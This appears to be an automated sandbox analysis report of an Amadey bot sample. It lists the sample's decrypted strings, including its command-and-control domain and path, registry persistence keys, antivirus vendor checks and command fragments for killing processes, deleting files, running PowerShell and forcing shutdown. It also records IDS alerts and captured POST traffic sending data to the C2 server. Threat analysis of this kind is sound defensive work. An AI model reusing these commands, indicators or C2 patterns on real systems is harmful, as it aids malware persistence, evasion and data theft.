Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: greatnessappreviews.com |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: /8BvxwQdec3/index.php |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: S-%lu- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 3d37ae315d |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Dctooux.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Startup |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: cmd /C RMDIR /s/q |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: rundll32 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Programs |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: %USERPROFILE% |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: cred.dll|clip.dll| |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: http:// |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: https:// |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: /Plugins/ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: &unit= |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: shell32.dll |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: kernel32.dll |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: GetNativeSystemInfo |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ProgramData\ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: AVAST Software |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Kaspersky Lab |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Panda Security |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Doctor Web |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 360TotalSecurity |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Bitdefender |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Norton |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Sophos |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Comodo |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: WinDefender |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 0123456789 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Content-Type: multipart/form-data; boundary=---- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ------ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ?scr=1 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Content-Type: application/x-www-form-urlencoded |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ComputerName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: -unicode- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: VideoID |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: DefaultSettings.XResolution |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: DefaultSettings.YResolution |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ProductName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: CurrentBuild |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: rundll32.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: "taskkill /f /im " |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: " && timeout 1 && del |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: && Exit" |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: " && ren |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Powershell.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: -executionpolicy remotesigned -File " |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: shutdown -s -t 0 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: random |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: >0b*j' |
Source: Traffic |
Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49735 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49738 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 45.156.23.149:80 -> 192.168.2.4:49738 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49752 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49757 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49763 -> 45.156.23.149:80 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUyMDU=Host: greatnessappreviews.comContent-Length: 85357Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/ |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php5 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1N8 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1n8 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpO |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpQ |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpny |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\Desktop\oTIHRjz4dn.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\1000154001\clip.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\1000427001\ma.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Jump to behavior |